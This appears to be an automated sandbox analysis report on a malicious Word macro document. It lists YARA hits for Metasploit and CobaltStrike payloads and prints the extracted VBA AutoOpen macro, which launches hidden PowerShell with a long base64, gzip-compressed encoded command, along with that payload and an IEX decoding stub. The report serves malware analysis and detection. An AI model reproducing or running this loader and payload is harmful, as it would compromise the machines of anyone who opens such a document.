AFgAVQB0ACsAUgB1AGcATQBoAFUAdgB2AHQAbABoAEoASQBSAG8AZgBWAGUAZwA4AFQAZABEAEEAYgBpAHEAMAB2ADcAZgBVAG0AawBPAGwAVwB4AGQAZwBOAGoAcgBQAEoAawBDAEYAdgBLAGEATAA1AEoAYgA5ADEAagBVAHAAbwA4AFAANQBoADMARwBwAHQAagBIAHUATQBoAHMASgBoAHcAOQBVADMAawA5AFcARQA3AGYAZwB6AHQAeAAzAHYAcABXAEIAeQBhAEEANgBPAFgATABTAFAASgBrAG4ARgAwAFcASQBqAFgAcwA5AHAAUQAwAEwAcQAwADIAQwA2AE4AdwBiAE4AKwBrAFIAdwBMAFYATwBLAGgARwBhAEYANAA3AFoAYQBYAFcARwBTAFIARwA3AEsAdQAyADEAWABIAHQATQB0AHgATwBuAEEAVQAyAFUAdABqADgAVQAzADQARABNAGQASABzAFMARwBkAE4AQgA1ADgAcgBCAG4AZQBuADMAZwBZAFcASQBEAFgANABCAEgAWgBzAFUAWgBKAG4ANABJAFAARQAyAGwAbgBwAGoASwBHAFYAZABQAEIAQQBWAGMAegB0AFcANgBZAGYAbgBkAG0AZABrAGMAcQBRAGYAZwB5AEUATgBUAGkAawBZAFEAaABNAGIAdgBaAHkAdgBJADEAWQBKAG4ANgBiAFUAdwBvADkAWAArAHgAVgBaAFcAagBRAHcAMwBnAFAANwBpAGwATgAzAFoALwA2AEwAZwAvADgANABpADEASAB1ADkAZwBTAG8ARABCAFMAeQBiAHIAMQBUAEsAMgBiADMALwB2AHYASgA4AGUAMwBxADUAOQBtAG4AdgA3ADMAZgBxAEMAYQB3AHgAcgBhAHgAMgA1AFMAcwB4ACsAbABDAHgAZgB0AFgAOABTAEMAZwBJADkAOABpAEMAUwBnAFkATgB6AFAAWAA2AEUAZAB4AEEAdQBMAFEAaABVADkAZgBNAE4ARQBxAGwAegB6AHYAbgBJAHcANABjAGIARQBGAFgAQwBYADMAbgB0AFcAaQB6AGwAdQBWAHEAVwBlAFAAMABpAHcANABHADIAcgBoAHoAYwAvAFUAQwBsADkATQBTAGgAawB6AGoAMAAxAEcAWgBlAGgAZQBFAGIAdQBrAGMAawB4AG8AWgBSAHQANQBjAFgAQwBLADgAOQBsAGgAWAB3AFMAOQBmAHQAaABCAGUAOQBRAE8ASQBZACsAegBzAHkATAA1AEsAMABTAGUARwBwAHUAbgBzAHYAMABtAFgAQwA3ADgAUABTADkAZgAxADAAdABLADcAdQBXAHIAVwBYAEgAMwB3ADUATwBOAE8AVgByADUAVAArAFkASgArAEUARABrADIALwBqADgAbQA0AEkAZABOAC8AegB1ADAARwBYAGgANQBmAC8AWQBPAFgAZQA3AFEANQAzAGkAVgBDADgAVQAvAEMAZwBYAFIAbwBEADcATQBoACsAWQBiAGYASAAxAGcAbgAzAHIATQB1AFIAYwBDAHoAYwBuAGQAdwBWAFgAaABVAHkAVwAvAGUAMAB1ADMAcQBFAHkASgAvAEkAYQA2AFIAZABSADMANgBnADcAQwBZADAATwBtAEEAZAA4AHIAdwBTADcASwBMAG0ATABxAC8AUABuADEAagBVAHEAUQBlAFYAYgA4AFIAcwAyAHgAaABxAEYAOQB2AGgAdQA2AEsAcgBBAFUAUQB6ACsAVgBtAGMANgBOAFoATQBJAHcAOQB6AGUAVQBZADgARgBrAHoAdwAwAEEAQQBBAD0APQAiACkAKQA7AEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACQAcwAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AAoA
        Imagebase:0x13fbd0000
        File size:473600 bytes
        MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:.Net C# or VB.NET
        Yara matches:
        • Rule: SUSP_PS1_FromBase64String_Content_Indicator, Description: Detects suspicious base64 encoded PowerShell expressions, Source: 00000002.00000002.418638987.0000000002DA7000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: Msfpayloads_msf_ref, Description: Metasploit Payloads - file msf-ref.ps1, Source: 00000002.00000002.421617900.0000000003A93000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000002.00000002.421617900.0000000003A93000.00000004.00000001.sdmp, Author: Avast Threat Intel Team
        • Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: 00000002.00000002.421617900.0000000003A93000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: WiltedTulip_WindowsTask, Description: Detects hack tool used in Operation Wilted Tulip - Windows Tasks, Source: 00000002.00000002.417824735.0000000000350000.00000004.00000020.sdmp, Author: Florian Roth
        • Rule: Msfpayloads_msf_ref, Description: Metasploit Payloads - file msf-ref.ps1, Source: 00000002.00000002.421677056.0000000003ADF000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000002.00000002.421677056.0000000003ADF000.00000004.00000001.sdmp, Author: Avast Threat Intel Team
        • Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: 00000002.00000002.421677056.0000000003ADF000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: Msfpayloads_msf_ref, Description: Metasploit Payloads - file msf-ref.ps1, Source: 00000002.00000002.420764427.0000000003737000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: SUSP_PS1_FromBase64String_Content_Indicator, Description: Detects suspicious base64 encoded PowerShell expressions, Source: 00000002.00000002.420764427.0000000003737000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000002.00000002.420764427.0000000003737000.00000004.00000001.sdmp, Author: Avast Threat Intel Team
        • Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: 00000002.00000002.420764427.0000000003737000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: Msfpayloads_msf_ref, Description: Metasploit Payloads - file msf-ref.ps1, Source: 00000002.00000002.421630363.0000000003AA1000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000002.00000002.421630363.0000000003AA1000.00000004.00000001.sdmp, Author: Avast Threat Intel Team
        • Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: 00000002.00000002.421630363.0000000003AA1000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000002.00000002.420980701.000000000389D000.00000004.00000001.sdmp, Author: Avast Threat Intel Team
        • Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: 00000002.00000002.420980701.000000000389D000.00000004.00000001.sdmp, Author: Joe Security
        Reputation:high

        General

        Start time:19:28:20
        Start date:15/11/2021
        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Wow64 process (32bit):true
        Commandline:"c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -s -NoLogo -NoProfile
        Imagebase:0x21f50000
        File size:452608 bytes
        MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:.Net C# or VB.NET
        Reputation:high

        Disassembly

        Code Analysis

        Call Graph

        Graph

        • Entrypoint
        • Decryption Function
        • Executed
        • Not Executed
        • Show Help
        callgraph 9 SquidGame_Click 10 CatchMeIfYouCan_Click 13 AutoOpen Shell:1

        Module: CatchMeIfYouCan

        Declaration
        LineContent
        1

        Attribute VB_Name = "CatchMeIfYouCan"

        2

        Attribute VB_Base = "0{1EFEF94B-5D68-499E-896C-2EF23F0DFA0F}{91AFCBA1-38EA-4EEC-AA4D-8812B8EABB58}"

        3

        Attribute VB_GlobalNameSpace = False

        4

        Attribute VB_Creatable = False

        5

        Attribute VB_PredeclaredId = True

        6

        Attribute VB_Exposed = False

        7

        Attribute VB_TemplateDerived = False

        8

        Attribute VB_Customizable = False

        Non-Executed Functions
        LineInstructionMeta Information
        9

        Private Sub SquidGame_Click()

        11

        End Sub

        LineInstructionMeta Information
        13

        Private Sub CatchMeIfYouCan_Click()

        15

        End Sub

        Module: Module1

        Declaration
        LineContent
        1

        Attribute VB_Name = "Module1"

        Executed Functions
        APIsMeta Information

        Shell

        Shell("powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWABiAFgATwBpAHkAaABMACsASABIADgARgBIADEASwBsAGwAcwBhAGcAcQBJAGwANwBhADYAcwBPAEsAQwBnAHEAKwBJAEoAdgBNAFMAZQBWAEcAbQBCAFEAbABIAGMARwBrAEoAegBkAC8AMwA0AGEAMQBKAHoAcwAzAGUAeQA5AFcAMwBXAHYAVgBaAFQARABUAEgAZABQADkAOQBQAFAAOQBEAFEASwBKAG4AYwBLAEMAVQB5AE4AUwBLADYATwBxAGIAcwBWAEQAawBMAFQAZABhAGgARwBvAFgARABiAGMAMABWAEMAZgBhAFgAKwBLAEIAYQBNAHkATgBGAEkATgBwADAATgBYAG4AZQBZAHYASABxAEIAcQA3ADAAaQBYAFEAOQB3AEcARgBKAC8ARgBXADYAbQBLAEUAQQAyAFYAYgBxAE4AVQBmAEIAcQB1ADMAcABrADQAUwBxAFYAdgAyAFMAQwBXAEkAOABDAFgATAA2ADUASwBkAHoAawBVADUARQBUAEkAZwBPAC8ATwBvAGkAWQBNAFgANgAxAE0AZABtADcAZQBnAGcAYgBsAFoANQBaAHoAKwB1ADUATgBqAEsAZABsAHkAOQBmAHUAbABFAFEAWQBJAGUAYwAzADIAdAA5AFQATgBnAHcAeABMAFoAcQBtAFQAZwBzAGwAYQBsAHYAMQBIAHEAUABBADMAdwAzAFUAUQA5AFkASQA5AFIAZgAxAE8AMQByAHIAVwArADUASwByAEkAdQBZAG0AawBYAGEAWABzAEkAaQBIAFgAMABiAEcAMwBzAGEAaQBpAEwAbwBLAFoANABsAGsAbABLAHgAVAAvAC8ATABKAGEAZgA3ACsAbwB2AE4AZAA2AFAAawBCAFcAVwBpAGsAbwBhAEUAbQB6AFgAZABNAHMAcQBsAHEAbgB2ADUAVwB6AEQAUgBlAHIAaABVAGwARQB5AHQAYwBBAE4AWABZAFAAVQAxAHEAYgBEAE4ARwByAEwAMwBIAHMANQBkADEANAA2ACsAMQA0AHMAWAB5AEwAYgBlAFEAagBpACsASABXAFEAbQBkAFcAegBUAHEAawBJAHcAeQBsAGcAdwA1ADQAeABMAEYAYQBwADUAMgB5AC8ANQA1AGMAWAA2AG8AOQAzAGIAKwBhAFIAUQAwAHcAYgAxADAAUwBIADQATQBEADEARgBCAHoARQBwAG8AYgBEADIAZwBBADUAdQBvAFgAbgAyAEEAQwAxAFkAZwBqAHAAYwAzAGIARgBNAGoAZwBSAFkAQgBJAEYARABuAFgAMQBCAGYAUgBpADkANABoAEwAdAAwADUAawBXAFYAVwB3ACsALwB5ADcAZABsADkASwBNAGsANgB1ADQAUAA2AHUAVQB1AG0AagBFAGsAaABOAFMAVgBDAHUAWABqAGoAeABPADMAQgBJAE8AVwAvAE8ANQBpAEMAYwBuADcAegAvAFEASwA0AHkALwBIADQAaQBXAEwAbgB3AHYAZgBBAEoAVgBYAFYAcwA0AFIAMABpACsASgBVAEEAdgBoACsANABXAHIAaQA1AGUAYwA2AEgARwBPAEkAcABUAGQAMwBRAHoAUABXACsAVQBuAFMAVgBrAHMAQQBKAFIATgB3AGcAegBkAEsANQBDAEMASgBjAGYAdgBrAG4AUAArAGQAdAByADUAcABoADkAWgBlAEcANgBsAGUAdABpADgANAA1AFAAVwBjAC8AdgBsAEwAUABLADkAZgBVAFgAdwBvADMANQBjAEsARgBQAGQAbgA4AHEAeABxAFoAbABvADYARABiAFAAMwBYAHAANgBHAEgARABkAFAAQgB2AGQAUgBCAHQAcQBsAGQAQwBWAC8ANgBMAEcAZgBZAHMASABDAE8AUgArADAAcQBKAG8ATwBmAHAAZQBKAGwAQQBlAHUAOQBDAHoAcgBGAEQATgBEAG4AbgA5AFYANAAyAHkAVAB2AHUAdAB6AFoATwBWAGEARAB2AEkAZgBnAEYAVgBDAGkALwBLAE0AegA1AHgAeQBXAGkAcQBJAGoAWQBSAHYAdwBPADcAOABEAFQAVwA4AE4ATwBHAGIANABLAG4AMAA1AFcAdQBsADEAOQArAHcAOQA0ADMATABYAFEAbQBGAFkAcABhAFkAUgBuAEgATwB0AFMAaQBrAFkAVwBWAGkAdgBVAHEAdwBUAG0AcABjAGwATgBpAEoAdQBQAGkAegArADQANgA0AFUAVwBjAFQAVQBVAEUAaQB1ADUAbAA3AEsAbgAwAEIANgAyAGIAcgByAE8AbgBCAGkASQBnADIAeQBDAHoAQQBzAEYAQQA5AHIASgByAEkAeQBWAEsAcgBVAHcATgBRAHgAbAB5AHIAbQA3AHUAcABDADgAVgBOAE0AdQBzAGkAeQA0AE0AaQBCAHAAUgBoAHkAQQBqAE0AWgBGAGcAcgBKAE8AQgBQAG8AMQBYAC8AbgBSADcAbQBtAFkAQwBMAGEAbgBvAFYAdABrAE0ANgByAGsARwBDAGgASABkAFMAYwB5ADQAbgBLADYAWQBaADIAVwBDAC8AKwBCADcAZQB2ADUAKwBSADgASwBEAEsAcwByAGkAQgA5AGMAQgBvAEkAbwBGAGcAdQBxAFYASQByAE0AeQBCAFEAMQA0AHIAVgBuADQAagAzAHYANwBuADMAWQA0AG4ANQB3AGMAMQB1AGcAQwArAEoATABPAFUASAA4AFoAbABMAFMAWABaAGMAYwBrAGsAdAB1ADEAeQArAHYAbQBPAFoASQB4AGMAUQBRAEUAMABJAFgASgB0AEQASQBXADQAMwBsAGIAeQBNAGwAWQByAE0AWQArAFMATABxAFgAUwBZAHQAWQBNACsASAB3AHMARABmADgAQQB2ADQASQBuAGgAWQBYAHkAQgBIADQAKwBIAGMANAArAGIAagB6AFUAKwBtAGsAdwBIADkATgBBAFEAWgA0ACsAOQBaAHAAUgBFAFkAcgBUAGcAYQBFAGEAZwBRAGUANwBOADcALwBPAEcARwBFAC8AYwBwADMAcABrAE4AKwB1ADYASgA4AFkAeQB6AEkAVQBQAC8AaQBEAHMAaQBYAEcAUABIAFQAUgA4AFYAMgBqAHYAegBNADcARgB6AGwAbAAvAHAAaQBaADEAZABTAE0ASwBEADIAcABmAGEAQQA1AFcAbwBaAEQASgBEADgAUwBZAEUALwB4AHUAeAA0AFgAeAB2AFIAaAAzADMAUwBIAG8AUABiAFkAOQBoADAAdgAwAEoAdQBhAEgAYgBiAHcAWgBhAHcAbABEAEgAagBIAGEAbgBkAEwAUgBxAHEATABRADkAZgA0AHEAbABjAGMAcgAzAHAATQBWAFIAeAArAHIAOQBaAGsAdwBsAE4AOABhAFAARABuAFIAKwBtAEIATwA2ADMAeQA0ADEAVgBjACsAegAwAHoAVgBrAFEAZAB4AGkAcwB4AE8AYQBUAHYARABWAEYARwA0AFYARAB0AEcAYgA5AE8AdQBkAE4AQQBHADgAbABnAGYAKwBZADgAdAAvAGEAMgBSAEMAbgBJAFQAYwBEAGcAcABxAGIAUwBmAHQAZgBXAFQAdABoAEUAUwBiAFMATwBQADAAOABHAFQAMwBBAGUANwBmAHIAVABlAE4AUQBlAFMAdwBvAEIAdABSAFQAOABsACsAagBLAGMARABCAGYAawBpAFoAawBpAHUANQBtAG0AVAByAE0AcgBIAHMAVABUAFcAUABQAEkAYQBqAE4AcwBCAHkAagB0AGUAbQBNAFQAcQA1AHgAQgBNAHQAMwBoA) -> 1292

        SquidGame

        StringsDecrypted Strings
        "powershell -nop -w hidden -encodedcommand "
        LineInstructionMeta Information
        2

        Sub AutoOpen()

        3

        Shell "powershell -nop -w hidden -encodedcommand " & CatchMeIfYouCan.SquidGame.ControlTipText

        Shell("powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWABiAFgATwBpAHkAaABMACsASABIADgARgBIADEASwBsAGwAcwBhAGcAcQBJAGwANwBhADYAcwBPAEsAQwBnAHEAKwBJAEoAdgBNAFMAZQBWAEcAbQBCAFEAbABIAGMARwBrAEoAegBkAC8AMwA0AGEAMQBKAHoAcwAzAGUAeQA5AFcAMwBXAHYAVgBaAFQARABUAEgAZABQADkAOQBQAFAAOQBEAFEASwBKAG4AYwBLAEMAVQB5AE4AUwBLADYATwBxAGIAcwBWAEQAawBMAFQAZABhAGgARwBvAFgARABiAGMAMABWAEMAZgBhAFgAKwBLAEIAYQBNAHkATgBGAEkATgBwADAATgBYAG4AZQBZAHYASABxAEIAcQA3ADAAaQBYAFEAOQB3AEcARgBKAC8ARgBXADYAbQBLAEUAQQAyAFYAYgBxAE4AVQBmAEIAcQB1ADMAcABrADQAUwBxAFYAdgAyAFMAQwBXAEkAOABDAFgATAA2ADUASwBkAHoAawBVADUARQBUAEkAZwBPAC8ATwBvAGkAWQBNAFgANgAxAE0AZABtADcAZQBnAGcAYgBsAFoANQBaAHoAKwB1ADUATgBqAEsAZABsAHkAOQBmAHUAbABFAFEAWQBJAGUAYwAzADIAdAA5AFQATgBnAHcAeABMAFoAcQBtAFQAZwBzAGwAYQBsAHYAMQBIAHEAUABBADMAdwAzAFUAUQA5AFkASQA5AFIAZgAxAE8AMQByAHIAVwArADUASwByAEkAdQBZAG0AawBYAGEAWABzAEkAaQBIAFgAMABiAEcAMwBzAGEAaQBpAEwAbwBLAFoANABsAGsAbABLAHgAVAAvAC8ATABKAGEAZgA3ACsAbwB2AE4AZAA2AFAAawBCAFcAVwBpAGsAbwBhAEUAbQB6AFgAZABNAHMAcQBsAHEAbgB2ADUAVwB6AEQAUgBlAHIAaABVAGwARQB5AHQAYwBBAE4AWABZAFAAVQAxAHEAYgBEAE4ARwByAEwAMwBIAHMANQBkADEANAA2ACsAMQA0AHMAWAB5AEwAYgBlAFEAagBpACsASABXAFEAbQBkAFcAegBUAHEAawBJAHcAeQBsAGcAdwA1ADQAeABMAEYAYQBwADUAMgB5AC8ANQA1AGMAWAA2AG8AOQAzAGIAKwBhAFIAUQAwAHcAYgAxADAAUwBIADQATQBEADEARgBCAHoARQBwAG8AYgBEADIAZwBBADUAdQBvAFgAbgAyAEEAQwAxAFkAZwBqAHAAYwAzAGIARgBNAGoAZwBSAFkAQgBJAEYARABuAFgAMQBCAGYAUgBpADkANABoAEwAdAAwADUAawBXAFYAVwB3ACsALwB5ADcAZABsADkASwBNAGsANgB1ADQAUAA2AHUAVQB1AG0AagBFAGsAaABOAFMAVgBDAHUAWABqAGoAeABPADMAQgBJAE8AVwAvAE8ANQBpAEMAYwBuADcAegAvAFEASwA0AHkALwBIADQAaQBXAEwAbgB3AHYAZgBBAEoAVgBYAFYAcwA0AFIAMABpACsASgBVAEEAdgBoACsANABXAHIAaQA1AGUAYwA2AEgARwBPAEkAcABUAGQAMwBRAHoAUABXACsAVQBuAFMAVgBrAHMAQQBKAFIATgB3AGcAegBkAEsANQBDAEMASgBjAGYAdgBrAG4AUAArAGQAdAByADUAcABoADkAWgBlAEcANgBsAGUAdABpADgANAA1AFAAVwBjAC8AdgBsAEwAUABLADkAZgBVAFgAdwBvADMANQBjAEsARgBQAGQAbgA4AHEAeABxAFoAbABvADYARABiAFAAMwBYAHAANgBHAEgARABkAFAAQgB2AGQAUgBCAHQAcQBsAGQAQwBWAC8ANgBMAEcAZgBZAHMASABDAE8AUgArADAAcQBKAG8ATwBmAHAAZQBKAGwAQQBlAHUAOQBDAHoAcgBGAEQATgBEAG4AbgA5AFYANAAyAHkAVAB2AHUAdAB6AFoATwBWAGEARAB2AEkAZgBnAEYAVgBDAGkALwBLAE0AegA1AHgAeQBXAGkAcQBJAGoAWQBSAHYAdwBPADcAOABEAFQAVwA4AE4ATwBHAGIANABLAG4AMAA1AFcAdQBsADEAOQArAHcAOQA0ADMATABYAFEAbQBGAFkAcABhAFkAUgBuAEgATwB0AFMAaQBrAFkAVwBWAGkAdgBVAHEAdwBUAG0AcABjAGwATgBpAEoAdQBQAGkAegArADQANgA0AFUAVwBjAFQAVQBVAEUAaQB1ADUAbAA3AEsAbgAwAEIANgAyAGIAcgByAE8AbgBCAGkASQBnADIAeQBDAHoAQQBzAEYAQQA5AHIASgByAEkAeQBWAEsAcgBVAHcATgBRAHgAbAB5AHIAbQA3AHUAcABDADgAVgBOAE0AdQBzAGkAeQA0AE0AaQBCAHAAUgBoAHkAQQBqAE0AWgBGAGcAcgBKAE8AQgBQAG8AMQBYAC8AbgBSADcAbQBtAFkAQwBMAGEAbgBvAFYAdABrAE0ANgByAGsARwBDAGgASABkAFMAYwB5ADQAbgBLADYAWQBaADIAVwBDAC8AKwBCADcAZQB2ADUAKwBSADgASwBEAEsAcwByAGkAQgA5AGMAQgBvAEkAbwBGAGcAdQBxAFYASQByAE0AeQBCAFEAMQA0AHIAVgBuADQAagAzAHYANwBuADMAWQA0AG4ANQB3AGMAMQB1AGcAQwArAEoATABPAFUASAA4AFoAbABMAFMAWABaAGMAYwBrAGsAdAB1ADEAeQArAHYAbQBPAFoASQB4AGMAUQBRAEUAMABJAFgASgB0AEQASQBXADQAMwBsAGIAeQBNAGwAWQByAE0AWQArAFMATABxAFgAUwBZAHQAWQBNACsASAB3AHMARABmADgAQQB2ADQASQBuAGgAWQBYAHkAQgBIADQAKwBIAGMANAArAGIAagB6AFUAKwBtAGsAdwBIADkATgBBAFEAWgA0ACsAOQBaAHAAUgBFAFkAcgBUAGcAYQBFAGEAZwBRAGUANwBOADcALwBPAEcARwBFAC8AYwBwADMAcABrAE4AKwB1ADYASgA4AFkAeQB6AEkAVQBQAC8AaQBEAHMAaQBYAEcAUABIAFQAUgA4AFYAMgBqAHYAegBNADcARgB6AGwAbAAvAHAAaQBaADEAZABTAE0ASwBEADIAcABmAGEAQQA1AFcAbwBaAEQASgBEADgAUwBZAEUALwB4AHUAeAA0AFgAeAB2AFIAaAAzADMAUwBIAG8AUABiAFkAOQBoADAAdgAwAEoAdQBhAEgAYgBiAHcAWgBhAHcAbABEAEgAagBIAGEAbgBkAEwAUgBxAHEATABRADkAZgA0AHEAbABjAGMAcgAzAHAATQBWAFIAeAArAHIAOQBaAGsAdwBsAE4AOABhAFAARABuAFIAKwBtAEIATwA2ADMAeQA0ADEAVgBjACsAegAwAHoAVgBrAFEAZAB4AGkAcwB4AE8AYQBUAHYARABWAEYARwA0AFYARAB0AEcAYgA5AE8AdQBkAE4AQQBHADgAbABnAGYAKwBZADgAdAAvAGEAMgBSAEMAbgBJAFQAYwBEAGcAcABxAGIAUwBmAHQAZgBXAFQAdABoAEUAUwBiAFMATwBQADAAOABHAFQAMwBBAGUANwBmAHIAVABlAE4AUQBlAFMAdwBvAEIAdABSAFQAOABsACsAagBLAGMARABCAGYAawBpAFoAawBpAHUANQBtAG0AVAByAE0AcgBIAHMAVABUAFcAUABQAEkAYQBqAE4AcwBCAHkAagB0AGUAbQBNAFQAcQA1AHgAQgBNAHQAMwBoA) -> 1292

        SquidGame

        executed
        4

        End Sub

        Module: ThisDocument

        Declaration
        LineContent
        1

        Attribute VB_Name = "ThisDocument"

        2

        Attribute VB_Base = "1Normal.ThisDocument"

        3

        Attribute VB_GlobalNameSpace = False

        4

        Attribute VB_Creatable = False

        5

        Attribute VB_PredeclaredId = True

        6

        Attribute VB_Exposed = True

        7

        Attribute VB_TemplateDerived = True

        8

        Attribute VB_Customizable = True

        Reset < >

          Executed Functions

          Memory Dump Source
          • Source File: 00000002.00000002.423250356.000007FF00290000.00000040.00000001.sdmp, Offset: 000007FF00290000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_7ff00290000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: bc8045bb69bd3fae8819728d3b78aca5664e355319c9e835a5af5102625e6334
          • Instruction ID: df25a597e7f159dcc436fd2b185828b74fa5b7bf2cebd4f1d09558d06397614a
          • Opcode Fuzzy Hash: bc8045bb69bd3fae8819728d3b78aca5664e355319c9e835a5af5102625e6334
          • Instruction Fuzzy Hash: BFA1C43061CB884FF355EB2C94457AABBD2FF99300F5845AEE48DC72A3DE7898058746
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000002.00000002.423250356.000007FF00290000.00000040.00000001.sdmp, Offset: 000007FF00290000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_7ff00290000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: af0b57347394caa010ec4da5eb9f230bc32aa1bd405c46753b9a4410e41af9f5
          • Instruction ID: 922c3150d72b7303925b853f7d670bc3d96335d07ea36a82eef6755d727a7f8f
          • Opcode Fuzzy Hash: af0b57347394caa010ec4da5eb9f230bc32aa1bd405c46753b9a4410e41af9f5
          • Instruction Fuzzy Hash: B541933060CB488FDB85EB2CD485B66BBE1FBA9305F1405AFE48DC7262DB75D8458B42
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000002.00000002.423250356.000007FF00290000.00000040.00000001.sdmp, Offset: 000007FF00290000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_7ff00290000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 2cff2c29dba6492492c70a80338b491e29428863ba88471fd52e88b8e36c1d7d
          • Instruction ID: d2353868636086f37b741a77d3a8ddd3add150eded23ad530635a0cdc7755459
          • Opcode Fuzzy Hash: 2cff2c29dba6492492c70a80338b491e29428863ba88471fd52e88b8e36c1d7d
          • Instruction Fuzzy Hash: 1521AE71508A8C8FE751DF28D858BE97FA0FF49344F2501ABE84CC7292CB789948C791
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000002.00000002.423250356.000007FF00290000.00000040.00000001.sdmp, Offset: 000007FF00290000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_7ff00290000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 8a70c0a7d4e69cd02fd9a8b0bdf1afcbbf795d86786f3436eef0d9ad490706cf
          • Instruction ID: 74e67bba545c9c1b0618746b3e66be649c62f1b569acf237f6be443b345dffdb
          • Opcode Fuzzy Hash: 8a70c0a7d4e69cd02fd9a8b0bdf1afcbbf795d86786f3436eef0d9ad490706cf
          • Instruction Fuzzy Hash: E611C83061CF4E0FD750EB2C9899B35BBD0FBA8315F04027AE94CC3262DA64D9418745
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000002.00000002.423250356.000007FF00290000.00000040.00000001.sdmp, Offset: 000007FF00290000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_7ff00290000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 4054996f9014a9145151bcb91390baa7f51ae2ff5e5b8b5172c29ee5ac188731
          • Instruction ID: b8687908ef95c13342cb6864dd7c7e1bb2019c0b57ca08cbcd5b734269bbb56b
          • Opcode Fuzzy Hash: 4054996f9014a9145151bcb91390baa7f51ae2ff5e5b8b5172c29ee5ac188731
          • Instruction Fuzzy Hash: DBF0AF8594E7C91FE70B137859616A07FB19F57240B5A00E7D984CE2E7E8090E998366
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000002.00000002.423250356.000007FF00290000.00000040.00000001.sdmp, Offset: 000007FF00290000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_7ff00290000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: ac0b43a2fdc689351051ca9f4d78bd8f22de49c021490e0aca79c65177ebedd2
          • Instruction ID: 45d90e114371980f0ac122457ba9e11a4f1ca5308222416780633d6aec50a440
          • Opcode Fuzzy Hash: ac0b43a2fdc689351051ca9f4d78bd8f22de49c021490e0aca79c65177ebedd2
          • Instruction Fuzzy Hash: D7F05E6081D3C98FC7065B3498562507FF0FF47615F4A42EBE4C9CB1A3D269950AC756
          Uniqueness

          Uniqueness Score: -1.00%

          Non-executed Functions

          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.423250356.000007FF00290000.00000040.00000001.sdmp, Offset: 000007FF00290000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_7ff00290000_powershell.jbxd
          Similarity
          • API ID:
          • String ID: H0'
          • API String ID: 0-4219766514
